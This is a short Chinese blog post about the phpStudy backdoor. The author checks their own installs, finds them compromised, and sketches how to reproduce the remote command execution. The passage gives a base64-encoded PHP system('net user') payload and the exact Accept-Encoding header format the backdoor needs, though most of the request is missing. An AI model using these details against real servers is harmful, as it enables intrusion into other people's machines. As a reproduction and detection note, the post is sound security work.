¶check
9月26号就写好了,一下子就到这个时候了,严重拖延症
先用公开的脚本check一下自己机器上常用的,phpstudy后门文件分析以及检测脚本
呵呵,中招,一直在使用phpstudy2016
版,上图是2018测试的(我的2016一样中招,被我修复了,没截图),也就是说做肉鸡三年了(微笑),不过好在我只在用的时候开启apache
。
阅读本篇文章能了解到:phpstudy, RCE
首发的文章说,官网下的并不会出问题,我使用的一直是官网的,上图也是2018版官网下的,一样中招,也就是phpstudy早在2016年甚至更早就被黑了。
¶复现
1 | GET / HTTP/1.1 |
呵呵,真好用!真香!
只需要更改ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
,base64
编码的命令而已
¶坑点
Accept-Encoding: gzip,deflate
注意:gzip,deflate
必须是此格式,中间只能有逗号,不能有空格
搞得我又测了好久,因为fiddler
抓包是这样的格式gzip, deflate
,这样会导致rce
失败
¶参考链接
https://www.t00ls.net/viewthread.php?tid=52922
https://www.t00ls.net/viewthread.php?tid=52966